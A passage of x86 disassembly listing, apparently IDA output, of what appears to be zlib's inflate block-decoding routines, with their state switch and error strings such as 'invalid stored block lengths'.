cmp [ebp+var_4], 0
jz short loc_49CB47
jmp short loc_49CB2B
; ---------------------------------------------------------------------------
loc_49CB24: ; CODE XREF: sub_49CB0D+38�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_49CB2B: ; CODE XREF: sub_49CB0D+15�j
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
test eax, eax
jz short loc_49CB47
mov eax, [ebp+var_8]
shl eax, 1
mov ecx, [ebp+var_4]
movzx ecx, byte ptr [ecx]
or eax, ecx
mov [ebp+var_8], eax
jmp short loc_49CB24
; ---------------------------------------------------------------------------
loc_49CB47: ; CODE XREF: sub_49CB0D+13�j
; sub_49CB0D+26�j
mov eax, [ebp+var_8]
xor edx, edx
div [ebp+arg_4]
mov eax, edx
leave
retn
sub_49CB0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49CB53 proc near ; CODE XREF: sub_49CBBF+7D�p
; sub_49D5B0+F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push ebx
xor ebx, ebx
push esi
mov esi, [ebp+arg_0]
cmp eax, ebx
push edi
jz short loc_49CB6A
mov ecx, [esi+3Ch]
mov [eax], ecx
loc_49CB6A: ; CODE XREF: sub_49CB53+10�j
mov eax, [esi]
mov edi, [ebp+arg_4]
cmp eax, 4
jz short loc_49CB79
cmp eax, 5
jnz short loc_49CB84
loc_49CB79: ; CODE XREF: sub_49CB53+1F�j
push dword ptr [esi+0Ch]
push dword ptr [edi+28h]
call dword ptr [edi+24h]
pop ecx
pop ecx
loc_49CB84: ; CODE XREF: sub_49CB53+24�j
cmp dword ptr [esi], 6
jnz short loc_49CB94
push edi
push dword ptr [esi+4]
call sub_49DBD8
pop ecx
pop ecx
loc_49CB94: ; CODE XREF: sub_49CB53+34�j
mov eax, [esi+28h]
mov [esi], ebx
mov [esi+34h], eax
mov [esi+30h], eax
mov eax, [esi+38h]
mov [esi+1Ch], ebx
cmp eax, ebx
mov [esi+20h], ebx
jz short loc_49CBBA
push ebx
push ebx
push ebx
call eax
mov [esi+3Ch], eax
add esp, 0Ch
mov [edi+30h], eax
loc_49CBBA: ; CODE XREF: sub_49CB53+57�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_49CB53 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49CBBF proc near ; CODE XREF: sub_49DF41+AF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 40h
push 1
push dword ptr [esi+28h]
call dword ptr [esi+20h]
mov edi, eax
add esp, 0Ch
test edi, edi
jz short loc_49CC26
push 5A0h
push 8
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [edi+24h], eax
test eax, eax
jnz short loc_49CBFD
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
pop ecx
jmp short loc_49CC26
; ---------------------------------------------------------------------------
loc_49CBFD: ; CODE XREF: sub_49CBBF+31�j
mov ebx, [ebp+arg_8]
push ebx
push 1
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [edi+28h], eax
test eax, eax
jnz short loc_49CC2A
push dword ptr [edi+24h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
add esp, 10h
loc_49CC26: ; CODE XREF: sub_49CBBF+1A�j
; sub_49CBBF+3C�j
xor eax, eax
jmp short loc_49CC46
; ---------------------------------------------------------------------------
loc_49CC2A: ; CODE XREF: sub_49CBBF+52�j
and dword ptr [edi], 0
add eax, ebx
mov [edi+2Ch], eax
mov eax, [ebp+arg_4]
push 0
push esi
push edi
mov [edi+38h], eax
call sub_49CB53
add esp, 0Ch
mov eax, edi
loc_49CC46: ; CODE XREF: sub_49CBBF+69�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_49CBBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49CC4B proc near ; CODE XREF: sub_49E043+11B�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
mov ecx, [eax]
mov eax, [eax+4]
mov [ebp+var_8], eax
mov eax, [ebx+20h]
mov [ebp+arg_0], eax
mov eax, [ebx+1Ch]
mov [ebp+var_10], ecx
mov ecx, [ebx+34h]
mov [ebp+var_4], eax
mov eax, [ebx+30h]
cmp ecx, eax
push edi
mov [ebp+var_C], ecx
jnb short loc_49CC83
sub eax, ecx
dec eax
jmp short loc_49CC88
; ---------------------------------------------------------------------------
loc_49CC83: ; CODE XREF: sub_49CC4B+31�j
mov eax, [ebx+2Ch]
sub eax, ecx
loc_49CC88: ; CODE XREF: sub_49CC4B+36�j
mov [ebp+var_14], eax
loc_49CC8B: ; CODE XREF: sub_49CC4B+AD�j
; sub_49CC4B+10B�j ...
mov eax, [ebx]
cmp eax, 9 ; switch 10 cases
ja loc_49D550 ; default
jmp ds:off_49D588[eax*4] ; switch jump
loc_49CC9D: ; DATA XREF: _4:off_49D588�o
mov edi, [ebp+var_4] ; jumptable 0049CC96 case 0
mov esi, [ebp+arg_0]
mov edx, [ebp+var_10]
cmp edi, 3
jnb short loc_49CCD7
loc_49CCAB: ; CODE XREF: sub_49CC4B+8A�j
cmp [ebp+var_8], 0
jz loc_49D28C
movzx eax, byte ptr [edx]
and [ebp+arg_8], 0
dec [ebp+var_8]
mov ecx, edi
add edi, 8
shl eax, cl
mov [ebp+var_4], edi
or esi, eax
inc edx
cmp edi, 3
mov [ebp+arg_0], esi
mov [ebp+var_10], edx
jb short loc_49CCAB
loc_49CCD7: ; CODE XREF: sub_49CC4B+5E�j
mov eax, esi
and eax, 7
mov ecx, eax
shr eax, 1
and ecx, 1
sub eax, 0
mov [ebx+18h], ecx
jz short loc_49CD5B
dec eax
jz short loc_49CD0D
dec eax
jz short loc_49CCFA
dec eax
jz loc_49D2A7
jmp short loc_49CC8B
; ---------------------------------------------------------------------------
loc_49CCFA: ; CODE XREF: sub_49CC4B+A4�j
push 3
pop eax
shr esi, 3
sub edi, eax
mov [ebp+arg_0], esi
mov [ebp+var_4], edi
jmp loc_49CDE7
; ---------------------------------------------------------------------------
loc_49CD0D: ; CODE XREF: sub_49CC4B+A1�j
mov edi, [ebp+arg_4]
lea eax, [ebp+var_1C]
push edi
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_28]
push eax
call sub_49E8AF
push edi
push [ebp+var_1C]
push [ebp+var_20]
push [ebp+var_24]
push [ebp+var_28]
call sub_49D5E6
add esp, 28h
mov [ebx+4], eax
test eax, eax
jz loc_49D2D7
shr esi, 3
sub [ebp+var_4], 3
mov [ebp+arg_0], esi
mov dword ptr [ebx], 6
jmp loc_49CC8B
; ---------------------------------------------------------------------------
loc_49CD5B: ; CODE XREF: sub_49CC4B+9E�j
sub edi, 3
mov dword ptr [ebx], 1
mov ecx, edi
and ecx, 7
shr esi, 3
shr esi, cl
sub edi, ecx
mov [ebp+var_4], edi
mov [ebp+arg_0], esi
jmp loc_49CC8B
; ---------------------------------------------------------------------------
loc_49CD7B: ; CODE XREF: sub_49CC4B+4B�j
; DATA XREF: _4:off_49D588�o
mov ecx, [ebp+var_4] ; jumptable 0049CC96 case 1
mov esi, [ebp+arg_0]
cmp ecx, 20h
jnb short loc_49CDAF
mov edx, [ebp+var_10]
xor edi, edi
loc_49CD8B: ; CODE XREF: sub_49CC4B+160�j
cmp [ebp+var_8], edi
jz loc_49D300
movzx eax, byte ptr [edx]
dec [ebp+var_8]
mov [ebp+arg_8], edi
shl eax, cl
add ecx, 8
or esi, eax
inc edx
cmp ecx, 20h
mov [ebp+var_10], edx
jb short loc_49CD8B
jmp short loc_49CDB2
; ---------------------------------------------------------------------------
loc_49CDAF: ; CODE XREF: sub_49CC4B+139�j
mov edx, [ebp+var_10]
loc_49CDB2: ; CODE XREF: sub_49CC4B+162�j
mov edi, esi
mov eax, esi
not edi
and eax, 0FFFFh
shr edi, 10h
xor edi, eax
jnz loc_49D30E
mov [ebx+4], eax
xor eax, eax
cmp [ebx+4], eax
mov [ebp+var_4], eax
mov [ebp+arg_0], eax
jz short loc_49CDDD
push 2
pop eax
jmp short loc_49CDE7
; ---------------------------------------------------------------------------
loc_49CDDD: ; CODE XREF: sub_49CC4B+18B�j
; sub_49CC4B+288�j
mov eax, [ebx+18h]
neg eax
sbb eax, eax
and eax, 7
loc_49CDE7: ; CODE XREF: sub_49CC4B+BD�j
; sub_49CC4B+190�j
mov [ebx], eax
jmp loc_49CC8B
; ---------------------------------------------------------------------------
loc_49CDEE: ; CODE XREF: sub_49CC4B+4B�j
; DATA XREF: _4:off_49D588�o
cmp [ebp+var_8], 0 ; jumptable 0049CC96 case 2
jz loc_49D326
mov ecx, [ebp+var_14]
test ecx, ecx
jnz loc_49CE93
mov ecx, [ebx+2Ch]
mov edx, [ebp+var_C]
cmp edx, ecx
jnz short loc_49CE30
mov eax, [ebx+30h]
mov esi, [ebx+28h]
cmp eax, esi
jz short loc_49CE30
mov edx, esi
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_49CE27
sub eax, edx
dec eax
mov ecx, eax
jmp short loc_49CE29
; ---------------------------------------------------------------------------
loc_49CE27: ; CODE XREF: sub_49CC4B+1D3�j
sub ecx, edx
loc_49CE29: ; CODE XREF: sub_49CC4B+1DA�j
test ecx, ecx
mov [ebp+var_14], ecx
jnz short loc_49CE93
loc_49CE30: ; CODE XREF: sub_49CC4B+1C0�j
; sub_49CC4B+1CA�j
push [ebp+arg_8]
mov esi, [ebp+arg_4]
mov [ebx+34h], edx
push esi
push ebx
call sub_49E8DE
mov edx, [ebx+34h]
mov [ebp+arg_8], eax
mov eax, [ebx+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_49CE5A
mov ecx, eax
sub ecx, edx
dec ecx
jmp short loc_49CE5F
; ---------------------------------------------------------------------------
loc_49CE5A: ; CODE XREF: sub_49CC4B+206�j
mov ecx, [ebx+2Ch]
sub ecx, edx
loc_49CE5F: ; CODE XREF: sub_49CC4B+20D�j
mov edi, [ebx+2Ch]
mov [ebp+var_14], ecx
cmp edx, edi
mov [ebp+var_18], edi
jnz short loc_49CE8B
mov edi, [ebx+28h]
cmp eax, edi
jz short loc_49CE8B
mov edx, edi
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_49CE83
sub eax, edx
dec eax
mov ecx, eax
jmp short loc_49CE88
; ---------------------------------------------------------------------------
loc_49CE83: ; CODE XREF: sub_49CC4B+22F�j
mov ecx, [ebp+var_18]
sub ecx, edx
loc_49CE88: ; CODE XREF: sub_49CC4B+236�j
mov [ebp+var_14], ecx
loc_49CE8B: ; CODE XREF: sub_49CC4B+21F�j
; sub_49CC4B+226�j
test ecx, ecx
jz loc_49D347
loc_49CE93: ; CODE XREF: sub_49CC4B+1B2�j
; sub_49CC4B+1E3�j
mov eax, [ebx+4]
and [ebp+arg_8], 0
cmp eax, [ebp+var_8]
jbe short loc_49CEA2
mov eax, [ebp+var_8]
loc_49CEA2: ; CODE XREF: sub_49CC4B+252�j
cmp eax, ecx
jbe short loc_49CEA8
mov eax, ecx
loc_49CEA8: ; CODE XREF: sub_49CC4B+259�j
mov esi, [ebp+var_10]
mov edi, [ebp+var_C]
mov ecx, eax
add [ebp+var_10], eax
mov edx, ecx
sub [ebp+var_8], eax
shr ecx, 2
rep movsd
add [ebp+var_C], eax
sub [ebp+var_14], eax
mov ecx, edx
and ecx, 3
rep movsb
sub [ebx+4], eax
jnz loc_49CC8B
jmp loc_49CDDD
; ---------------------------------------------------------------------------
loc_49CED8: ; CODE XREF: sub_49CC4B+4B�j
; DATA XREF: _4:off_49D588�o
mov ecx, [ebp+var_4] ; jumptable 0049CC96 case 3
mov edi, [ebp+var_10]
cmp ecx, 0Eh
jnb short loc_49CF08
loc_49CEE3: ; CODE XREF: sub_49CC4B+2BB�j
cmp [ebp+var_8], 0
jz loc_49D370
movzx eax, byte ptr [edi]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl eax, cl
add ecx, 8
mov [ebp+var_4], ecx
or [ebp+arg_0], eax
inc edi
cmp ecx, 0Eh
jb short loc_49CEE3
loc_49CF08: ; CODE XREF: sub_49CC4B+296�j
mov eax, [ebp+arg_0]
and eax, 3FFFh
mov ecx, eax
mov [ebx+4], eax
and ecx, 1Fh
cmp ecx, 1Dh
ja loc_49D3C2
mov edx, eax
and edx, 3E0h
cmp edx, 3A0h
ja loc_49D3C2
mov esi, [ebp+arg_4]
push 4
shr eax, 5
and eax, 1Fh
lea eax, [eax+ecx+102h]
push eax
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebx+0Ch], eax
test eax, eax
jz loc_49D39A
shr [ebp+arg_0], 0Eh
sub [ebp+var_4], 0Eh
and dword ptr [ebx+8], 0
mov dword ptr [ebx], 4
jmp short loc_49CF76
; ---------------------------------------------------------------------------
loc_49CF70: ; CODE XREF: sub_49CC4B+4B�j
; DATA XREF: _4:off_49D588�o
mov edi, [ebp+var_10] ; jumptable 0049CC96 case 4
mov esi, [ebp+arg_4]
loc_49CF76: ; CODE XREF: sub_49CC4B+323�j
mov eax, [ebx+4]
shr eax, 0Ah
add eax, 4
cmp [ebx+8], eax
jnb short loc_49CFDF
loc_49CF84: ; CODE XREF: sub_49CC4B+392�j
mov ecx, [ebp+var_4]
loc_49CF87: ; CODE XREF: sub_49CC4B+361�j
cmp ecx, 3
jnb short loc_49CFAE
cmp [ebp+var_8], 0
jz loc_49D432
movzx eax, byte ptr [edi]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl eax, cl
or [ebp+arg_0], eax
inc edi
add ecx, 8
mov [ebp+var_4], ecx
jmp short loc_49CF87
; ---------------------------------------------------------------------------
loc_49CFAE: ; CODE XREF: sub_49CC4B+33F�j
mov ecx, [ebx+8]
mov eax, [ebp+arg_0]
mov edx, [ebx+0Ch]
and eax, 7
mov ecx, ds:dword_49F060[ecx*4]
sub [ebp+var_4], 3
shr [ebp+arg_0], 3
mov [edx+ecx*4], eax
mov ecx, [ebx+4]
inc dword ptr [ebx+8]
mov eax, [ebx+8]
shr ecx, 0Ah
add ecx, 4
cmp eax, ecx
jb short loc_49CF84
loc_49CFDF: ; CODE XREF: sub_49CC4B+337�j
; sub_49CC4B+3AE�j
cmp dword ptr [ebx+8], 13h
jnb short loc_49CFFB
mov eax, [ebx+8]
mov ecx, [ebx+0Ch]
mov eax, ds:dword_49F060[eax*4]
and dword ptr [ecx+eax*4], 0
inc dword ptr [ebx+8]
jmp short loc_49CFDF
; ---------------------------------------------------------------------------
loc_49CFFB: ; CODE XREF: sub_49CC4B+398�j
push esi
lea ecx, [ebx+14h]
push dword ptr [ebx+24h]
lea eax, [ebx+10h]
push ecx
push eax
push dword ptr [ebx+0Ch]
mov dword ptr [eax], 7
call sub_49E3A6
add esp, 14h
mov [ebp+var_14], eax
test eax, eax
jnz loc_49D3F2
and [ebx+8], eax
mov dword ptr [ebx], 5
jmp short loc_49D034
; ---------------------------------------------------------------------------
loc_49D02E: ; CODE XREF: sub_49CC4B+4B�j
; DATA XREF: _4:off_49D588�o
mov edi, [ebp+var_10] ; jumptable 0049CC96 case 5
mov esi, [ebp+arg_4]
loc_49D034: ; CODE XREF: sub_49CC4B+3E1�j
; sub_49CC4B+46B�j ...
mov eax, [ebx+4]
mov ecx, [ebx+8]
mov edx, eax
and eax, 1Fh
shr edx, 5
and edx, 1Fh
lea eax, [edx+eax+102h]
cmp ecx, eax
jnb loc_49D178
mov eax, [ebx+10h]
loc_49D057: ; CODE XREF: sub_49CC4B+432�j
cmp [ebp+var_4], eax
jnb short loc_49D07F
cmp [ebp+var_8], 0
jz loc_49D432
movzx edx, byte ptr [edi]
mov ecx, [ebp+var_4]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl edx, cl
or [ebp+arg_0], edx
inc edi
add [ebp+var_4], 8
jmp short loc_49D057
; ---------------------------------------------------------------------------
loc_49D07F: ; CODE XREF: sub_49CC4B+40F�j
mov eax, ds:dword_4A1318[eax*4]
mov ecx, [ebx+14h]
and eax, [ebp+arg_0]
mov edx, [ecx+eax*8+4]
lea eax, [ecx+eax*8]
cmp edx, 10h
mov [ebp+var_18], edx
movzx ecx, byte ptr [eax+1]
mov [ebp+var_14], ecx
jnb short loc_49D0BB
shr [ebp+arg_0], cl
mov eax, ecx
mov ecx, [ebx+0Ch]
sub [ebp+var_4], eax
mov eax, [ebx+8]
mov [ecx+eax*4], edx
inc dword ptr [ebx+8]
jmp loc_49D034
; ---------------------------------------------------------------------------
loc_49D0BB: ; CODE XREF: sub_49CC4B+455�j
cmp edx, 12h
jnz short loc_49D0C5
push 7
pop eax
jmp short loc_49D0C8
; ---------------------------------------------------------------------------
loc_49D0C5: ; CODE XREF: sub_49CC4B+473�j
lea eax, [edx-0Eh]
loc_49D0C8: ; CODE XREF: sub_49CC4B+478�j
xor ecx, ecx
cmp edx, 12h
setnz cl
dec ecx
and ecx, 8
add ecx, 3
mov [ebp+var_10], ecx
loc_49D0DA: ; CODE XREF: sub_49CC4B+4BB�j
mov ecx, [ebp+var_14]
lea edx, [eax+ecx]
cmp [ebp+var_4], edx
jnb short loc_49D108
cmp [ebp+var_8], 0
jz loc_49D432
movzx edx, byte ptr [edi]
mov ecx, [ebp+var_4]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl edx, cl
or [ebp+arg_0], edx
inc edi
add [ebp+var_4], 8
jmp short loc_49D0DA
; ---------------------------------------------------------------------------
loc_49D108: ; CODE XREF: sub_49CC4B+498�j
shr [ebp+arg_0], cl
mov ecx, ds:dword_4A1318[eax*4]
and ecx, [ebp+arg_0]
add [ebp+var_10], ecx
mov ecx, eax
shr [ebp+arg_0], cl
mov ecx, [ebp+var_14]
add eax, ecx
mov ecx, [ebx+8]
sub [ebp+var_4], eax
mov eax, [ebx+4]
mov edx, eax
and eax, 1Fh
shr edx, 5
and edx, 1Fh
lea eax, [edx+eax+102h]
mov edx, [ebp+var_10]
add edx, ecx
cmp edx, eax
ja loc_49D456
cmp [ebp+var_18], 10h
jnz short loc_49D162
cmp ecx, 1
jb loc_49D456
mov eax, [ebx+0Ch]
mov eax, [eax+ecx*4-4]
jmp short loc_49D164
; ---------------------------------------------------------------------------
loc_49D162: ; CODE XREF: sub_49CC4B+503�j
xor eax, eax
loc_49D164: ; CODE XREF: sub_49CC4B+515�j
; sub_49CC4B+523�j
mov edx, [ebx+0Ch]
mov [edx+ecx*4], eax
inc ecx
dec [ebp+var_10]
jnz short loc_49D164
mov [ebx+8], ecx
jmp loc_49D034
; ---------------------------------------------------------------------------
loc_49D178: ; CODE XREF: sub_49CC4B+403�j
push esi
lea ecx, [ebp+var_2C]
push dword ptr [ebx+24h]
mov eax, [ebx+4]
and dword ptr [ebx+14h], 0
mov [ebp+var_18], 9
push ecx
lea ecx, [ebp+var_30]
push ecx
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_18]
push ecx
mov ecx, eax
push dword ptr [ebx+0Ch]
and eax, 1Fh
shr ecx, 5
and ecx, 1Fh
add eax, 101h
inc ecx
mov [ebp+var_10], 6
push ecx
push eax
call sub_49E7AC
add esp, 24h
mov [ebp+var_14], eax
test eax, eax
jnz loc_49D49E
push esi
push [ebp+var_2C]
push [ebp+var_30]
push [ebp+var_10]
push [ebp+var_18]
call sub_49D5E6
add esp, 14h
test eax, eax
jz loc_49D39A
push dword ptr [ebx+0Ch]
mov [ebx+4], eax
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov dword ptr [ebx], 6
pop ecx
jmp short loc_49D203
; ---------------------------------------------------------------------------
loc_49D1FD: ; CODE XREF: sub_49CC4B+4B�j
; DATA XREF: _4:off_49D588�o
mov edi, [ebp+var_10] ; jumptable 0049CC96 case 6
mov esi, [ebp+arg_4]
loc_49D203: ; CODE XREF: sub_49CC4B+5B0�j
mov eax, [ebp+arg_0]
push [ebp+arg_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
push esi
mov [esi], edi
push ebx
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
call sub_49D61A
add esp, 0Ch
cmp eax, 1
jnz loc_49D4EE
and [ebp+arg_8], 0
push esi
push dword ptr [ebx+4]
call sub_49DBD8
mov eax, [esi+4]
mov edi, [esi]
mov [ebp+var_8], eax
mov eax, [ebx+20h]
pop ecx
mov [ebp+arg_0], eax
mov eax, [ebx+1Ch]
pop ecx
mov ecx, [ebx+34h]
mov [ebp+var_4], eax
mov eax, [ebx+30h]
mov [ebp+var_10], edi
cmp ecx, eax
mov [ebp+var_C], ecx
jnb short loc_49D272
sub eax, ecx
dec eax
jmp short loc_49D277
; ---------------------------------------------------------------------------
loc_49D272: ; CODE XREF: sub_49CC4B+620�j
mov eax, [ebx+2Ch]
sub eax, ecx
loc_49D277: ; CODE XREF: sub_49CC4B+625�j
cmp dword ptr [ebx+18h], 0
mov [ebp+var_14], eax
jnz loc_49D4A7
and dword ptr [ebx], 0
jmp loc_49CC8B
; ---------------------------------------------------------------------------
loc_49D28C: ; CODE XREF: sub_49CC4B+64�j
mov eax, [ebp+arg_4]
mov [ebx+20h], esi
mov [ebx+1Ch], edi
and dword ptr [eax+4], 0
loc_49D299: ; CODE XREF: sub_49CC4B+6C1�j
mov ecx, edx
sub ecx, [eax]
mov [eax], edx
add [eax+8], ecx
jmp loc_49D38C
; ---------------------------------------------------------------------------
loc_49D2A7: ; CODE XREF: sub_49CC4B+A7�j
mov eax, [ebp+arg_4]
mov dword ptr [ebx], 9
shr esi, 3
add edi, 0FFFFFFFDh
mov dword ptr [eax+18h], offset aInvalidBlockTy ; "invalid block type"
mov [ebx+20h], esi
mov [ebx+1Ch], edi
loc_49D2C3: ; CODE XREF: sub_49CC4B+6D9�j
mov ecx, [ebp+var_8]
mov [eax+4], ecx
mov ecx, edx
sub ecx, [eax]
mov [eax], edx
add [eax+8], ecx
jmp loc_49D546
; ---------------------------------------------------------------------------
loc_49D2D7: ; CODE XREF: sub_49CC4B+F5�j
mov eax, [ebp+var_4]
mov [ebx+20h], esi
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [edi+4], eax
mov eax, [ebp+var_10]
mov ecx, eax
push 0FFFFFFFCh
sub ecx, [edi]
mov [edi], eax
mov eax, [ebp+var_C]
push edi
add [edi+8], ecx
mov [ebx+34h], eax
jmp loc_49D57A
; ---------------------------------------------------------------------------
loc_49D300: ; CODE XREF: sub_49CC4B+143�j
mov eax, [ebp+arg_4]
mov [ebx+20h], esi
mov [ebx+1Ch], ecx
mov [eax+4], edi
jmp short loc_49D299
; ---------------------------------------------------------------------------
loc_49D30E: ; CODE XREF: sub_49CC4B+177�j
mov eax, [ebp+arg_4]
mov dword ptr [ebx], 9
mov dword ptr [eax+18h], offset aInvalidStoredB ; "invalid stored block lengths"
mov [ebx+20h], esi
mov [ebx+1Ch], ecx
jmp short loc_49D2C3
; ---------------------------------------------------------------------------
loc_49D326: ; CODE XREF: sub_49CC4B+1A7�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
mov edx, ecx
sub edx, [eax]
and dword ptr [eax+4], 0
mov [eax], ecx
add [eax+8], edx
jmp short loc_49D38C
; ---------------------------------------------------------------------------
loc_49D347: ; CODE XREF: sub_49CC4B+242�j
mov eax, [ebp+arg_0]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_10]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [ebx+34h], edx
loc_49D368: ; CODE XREF: sub_49CC4B+806�j
push [ebp+arg_8]
jmp loc_49D522
; ---------------------------------------------------------------------------
loc_49D370: ; CODE XREF: sub_49CC4B+29C�j
mov eax, [ebp+arg_0]
mov ecx, edi
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
sub ecx, [eax]
and dword ptr [eax+4], 0
mov [eax], edi
add [eax+8], ecx
loc_49D38C: ; CODE XREF: sub_49CC4B+657�j
; sub_49CC4B+6FA�j
mov ecx, [ebp+var_C]
push [ebp+arg_8]
mov [ebx+34h], ecx
jmp loc_49D579
; ---------------------------------------------------------------------------
loc_49D39A: ; CODE XREF: sub_49CC4B+30B�j
; sub_49CC4B+596�j
mov eax, [ebp+arg_0]
push 0FFFFFFFCh
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_49D522
; ---------------------------------------------------------------------------
loc_49D3C2: ; CODE XREF: sub_49CC4B+2D0�j
; sub_49CC4B+2E4�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov dword ptr [ebx], 9
mov dword ptr [eax+18h], offset aTooManyLengthO ; "too many length or distance symbols"
mov [ebx+20h], ecx
mov ecx, [ebp+var_4]
mov [ebx+1Ch], ecx
mov ecx, [ebp+var_8]
mov [eax+4], ecx
mov ecx, edi
sub ecx, [eax]
mov [eax], edi
add [eax+8], ecx
jmp loc_49D546
; ---------------------------------------------------------------------------
loc_49D3F2: ; CODE XREF: sub_49CC4B+3D2�j
cmp [ebp+var_14], 0FFFFFFFDh
loc_49D3F6: ; CODE XREF: sub_49CC4B+857�j
jnz short loc_49D409
push dword ptr [ebx+0Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov dword ptr [ebx], 9
pop ecx
loc_49D409: ; CODE XREF: sub_49CC4B:loc_49D3F6�j
mov eax, [ebp+arg_0]
push [ebp+var_14]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_49D522
; ---------------------------------------------------------------------------
loc_49D432: ; CODE XREF: sub_49CC4B+345�j
; sub_49CC4B+415�j ...
mov eax, [ebp+arg_0]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
and dword ptr [esi+4], 0
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_49D368
; ---------------------------------------------------------------------------
loc_49D456: ; CODE XREF: sub_49CC4B+4F9�j
; sub_49CC4B+508�j
push dword ptr [ebx+0Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
mov eax, [ebp+arg_0]
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidBitLeng ; "invalid bit length repeat"
mov [ebx+20h], eax
mov eax, [ebp+var_4]
push 0FFFFFFFDh
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
push esi
mov [esi], edi
push ebx
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
call sub_49E8DE
add esp, 14h
jmp loc_49D583
; ---------------------------------------------------------------------------
loc_49D49E: ; CODE XREF: sub_49CC4B+579�j
cmp [ebp+var_14], 0FFFFFFFDh
jmp loc_49D3F6
; ---------------------------------------------------------------------------
loc_49D4A7: ; CODE XREF: sub_49CC4B+633�j
mov dword ptr [ebx], 7
jmp short loc_49D4B8
; ---------------------------------------------------------------------------
loc_49D4AF: ; CODE XREF: sub_49CC4B+4B�j
; DATA XREF: _4:off_49D588�o
mov edi, [ebp+var_10] ; jumptable 0049CC96 case 7
mov esi, [ebp+arg_4]
mov ecx, [ebp+var_C]
loc_49D4B8: ; CODE XREF: sub_49CC4B+862�j
push [ebp+arg_8]
mov [ebx+34h], ecx
push esi
push ebx
call sub_49E8DE
mov ecx, [ebx+34h]
add esp, 0Ch
cmp [ebx+30h], ecx
jz short loc_49D4F1
mov edx, [ebp+arg_0]
mov [ebx+20h], edx
mov edx, [ebp+var_4]
mov [ebx+1Ch], edx
mov edx, [ebp+var_8]
mov [esi+4], edx
mov edx, edi
sub edx, [esi]
mov [esi], edi
add [esi+8], edx
mov [ebx+34h], ecx
loc_49D4EE: ; CODE XREF: sub_49CC4B+5E9�j
push eax
jmp short loc_49D522
; ---------------------------------------------------------------------------
loc_49D4F1: ; CODE XREF: sub_49CC4B+883�j
mov dword ptr [ebx], 8
jmp short loc_49D502
; ---------------------------------------------------------------------------
loc_49D4F9: ; CODE XREF: sub_49CC4B+4B�j
; DATA XREF: _4:off_49D588�o
mov edi, [ebp+var_10] ; jumptable 0049CC96 case 8
